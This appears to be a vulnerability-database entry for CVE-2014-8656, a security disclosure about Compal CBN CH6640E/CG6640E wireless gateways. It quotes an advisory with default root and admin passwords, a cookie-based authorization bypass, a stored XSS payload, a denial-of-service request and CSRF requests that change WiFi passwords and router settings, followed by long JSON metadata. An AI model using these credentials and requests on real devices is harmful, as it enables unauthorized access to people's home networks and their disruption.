VAR-201411-0179
Vulnerability from variot - Updated: 2025-04-13 23:14The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities 2. A denial-of-service vulnerability 3. An HTML-injection vulnerability 4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "70762"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 0.4
},
"cve": "CVE-2014-8656",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8656",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-76601",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8656",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-8656",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76601",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities\n2. A denial-of-service vulnerability\n3. An HTML-injection vulnerability\n4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8656"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76601",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8656",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.6
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113836",
"trust": 1.8
},
{
"db": "BID",
"id": "70762",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76601",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"id": "VAR-201411-0179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.428000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2014-11-06T15:55:10.913000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-12-03T00:56:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities in certain firmware that gain access to certain critical information",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…